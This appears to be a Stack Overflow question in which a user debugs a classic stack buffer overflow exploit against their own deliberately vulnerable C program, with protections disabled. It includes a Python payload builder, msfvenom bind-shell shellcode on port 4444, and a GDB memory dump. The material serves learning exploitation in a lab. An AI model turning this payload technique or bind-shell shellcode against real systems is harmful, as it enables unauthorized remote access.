# Segmentation Fault in the middle of a stack buffer overlow exploit

Tags: python, c, gdb, stack-overflow, exploit

I'm exploiting this code right here

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int copytobuffer(char *input)
{
        char buffer[256];
        strcpy(buffer, input);
return 0;
}

void main(int argc, char *argv[])
{
        int local_variable = 0;
        copytobuffer(argv[1]);
        exit(0);
}
```

which was compiled like this

```
gcc -z execstack -fno-stack-protector buffer.c -o buffer.out
```

I've also turned off the system ASLR for the OS(64 bit kali)

The exploit.py file which makes the input.txt file looks like this

```
#!/usr/bin/python
from struct import *


buf = "A" * 264   #layer of A

buf += pack("<Q", 0x7fffffffe3a8)  #return address

buf += "\x90" * 64    #NOP sled

buf += b"\xdb\xd0\xb8\xb6\x36\xf9\x5a\xd9\x74\x24\xf4\x5e\x29" #Shell code
buf += b"\xc9\xb1\x14\x31\x46\x19\x03\x46\x19\x83\xc6\x04\x54"
buf += b"\xc3\xc8\x81\x6f\xcf\x78\x75\xdc\x7a\x7d\xf0\x03\xca"
buf += b"\xe7\xcf\x43\x70\xb6\x9d\x2b\x85\x46\x33\xf7\xe3\x56"
buf += b"\x62\x57\x7d\xb7\xee\x31\x25\xf5\x6f\x34\x94\x01\xc3"
buf += b"\x42\xa7\x6c\xee\xca\x84\xc0\x96\x07\x8a\xb2\x0e\xfd"
buf += b"\xb4\xec\x7d\x81\x82\x75\x86\xe9\x3b\xa9\x05\x81\x2b"
buf += b"\x9a\x8b\x38\xc2\x6d\xa8\xea\x49\xe7\xce\xba\x65\x3a"
buf += b"\x90"

f = open("input.txt", "w+") #write to input.txt
f.write(buf)
f.close()
```

I generating the shellcode using msfvenom

```
msfvenom -p linux/x86/shell_bind_tcp -b '\x00\x0A\x0D\xFF' -f c LPORT=4444 -f python
```

When I run the exploit it goes to the NOP sled and runs through the NOP sled just fine. The problem occurs when it's in the middle of executing the shellcode.

This is what GDB looks like.

```
(gdb) run $(cat input.txt)
Starting program: /home/kali/buffer.out $(cat input.txt)

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe3dd in ?? ()
(gdb)
```

This is what the memory layout looks like.

```
0x7fffffffe278: 0x74756f2e      0x41414100      0x41414141      0x41414141  #layer of A's
0x7fffffffe288: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe298: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2a8: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2b8: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2c8: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2d8: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2e8: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe2f8: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe308: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe318: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe328: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe338: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe348: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe358: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe368: 0x41414141      0x41414141      0x41414141      0x41414141
0x7fffffffe378: 0x41414141      0x41414141      0x41414141      0xffe3a841
0x7fffffffe388: 0x007fffff      0x90909000      0x90909090      0x90909090   #NOP sled
0x7fffffffe398: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe3a8: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe3b8: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe3c8: 0x90909090      0xb8d0db90      0x5af936b6      0xf42474d9   #shell code
0x7fffffffe3d8: 0xb1c9295e      0x19463114      0x83194603      0xc35404c6   #SEGFAULT here
0x7fffffffe3e8: 0xcf6f81c8      0x7adc7578      0xca03f07d      0x7043cfe7
0x7fffffffe3f8: 0x852b9db6      0xe3f73346      0x7d576256      0x2531eeb7
0x7fffffffe408: 0x94346ff5      0xa742c301      0x84caee6c      0x8a0796c0
0x7fffffffe418: 0xb4fd0eb2      0x82817dec      0x3be98675      0x2b8105a9
0x7fffffffe428: 0xc2388b9a      0x49eaa86d      0x65bacee7      0x4300903a
0x7fffffffe438: 0x524f4c4f      0x47424746      0x3b35313d      0x4f430030
--Type <RET> for more, q to quit, c to continue without paging--
```

Why is this happening and how can I fix this?

Comment: You should disassemble that block of code, so you can read it as assembler instructions. It will probably make a lot more sense then.

Comment: The interesting thing here is that pack("<Q", 0x7fffffffe3a8) will have 2 NULs in it, so both Unix argument passing and the program’s strcpy are not going to copy anything beyond the first NUL. But the data is there in the process’s memory, after the single NUL at location 0x7fffffffe388, so maybe the program is actually executing argv[2] and there’s an alignment issue.

Comment: @SuperStormer is it ? Isn't the name of this website Stack Overflow ?

Comment: @grim_ops you should use the x64 shellcode from msfvenom